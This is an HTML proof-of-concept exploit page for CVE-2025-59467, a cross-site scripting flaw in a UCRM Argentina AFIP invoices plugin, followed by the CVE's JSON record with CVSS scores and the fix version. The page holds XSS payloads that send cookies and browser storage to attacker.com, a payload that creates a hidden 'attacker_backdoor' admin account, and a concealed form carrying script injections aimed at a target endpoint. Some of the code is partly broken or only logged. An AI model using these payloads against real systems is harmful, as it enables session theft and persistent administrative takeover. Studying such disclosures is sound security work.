CVE-2025-59467

<!-- CVE-2025-59467 XSS PoC for UCRM Argentina AFIP Plugin --> <!-- This PoC demonstrates the XSS vulnerability in the AFIP invoices plugin --> <!-- Attack scenario: Trick administrator into visiting this page --> <!DOCTYPE html> <html> <head> <title>Malicious Page - CVE-2025-59467</title> </head> <body> <h1>CVE-2025-59467 XSS PoC</h1> <p>This page demonstrates the stored XSS vulnerability in UCRM Argentina AFIP invoices Plugin.</p> <!-- Simulated malicious payload injection --> <script> // Malicious payload that could be injected via AFIP plugin input fields var xssPayload = '<img src=x onerror="fetch(\\'https://attacker.com/steal?cookie=\\'+document.cookie)\\'">'; // Alternative payload for privilege escalation var escalationPayload = ` <script> // Steal admin session fetch('https://attacker.com/api/admin/exploit', { method: 'POST', body: JSON.stringify({ cookies: document.cookie, localStorage: localStorage, sessionStorage: sessionStorage }) }); // Create malicious admin account fetch('/api/admin/users', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({ username: 'attacker_backdoor', password: 'P@ssw0rd123', role: 'admin' }) }); </script> `; console.log('XSS Payload prepared:', xssPayload); console.log('Escalation Payload prepared'); </script> <!-- Social engineering component --> <div style="display:none;"> <!-- This would be hidden and auto-submitted in real attack --> <form id="exploitForm" action="https://target-ucrm.com/plugin/afip/invoices/submit" method="POST"> <input type="hidden" name="invoice_data" value="<img src=x onerror='alert("XSS")'>"> <input type="hidden" name="tax_id" value="<script>maliciousCode()</script>"> </form> </div> <p><strong>Note:</strong> This is for educational and security testing purposes only.</p> </body> </html>

{"cve": {"id": "CVE-2025-59467", "sourceIdentifier": "[email protected]", "published": "2026-01-05T17:15:45.987", "lastModified": "2026-02-05T21:22:19.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Scripting (XSS) vulnerability in the UCRM Argentina AFIP invoices Plugin (v1.2.0 and earlier) could allow privilege escalation if an Administrator is tricked into visiting a crafted malicious page. \n\nThis plugin is disabled by default.\n\n\nAffected Products:\nUCRM Argentina AFIP invoices Plugin (Version 1.2.0 and earlier)\n\n \n\nMitigation:\nUpdate UCRM Argentina AFIP invoices Plugin to Version 1.3.0 or later."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ui:argentina_afip_invoices:*:*:*:*:*:ucrm:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "E2AD2150-0BF5-4FAA-A668-7B9154523611"}]}]}], "references": [{"url": "https://community.ui.com/releases/Security-Advisory-Bulletin-057/6d3f2a51-22b8-47a1-9296-1e9dcd64e073", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}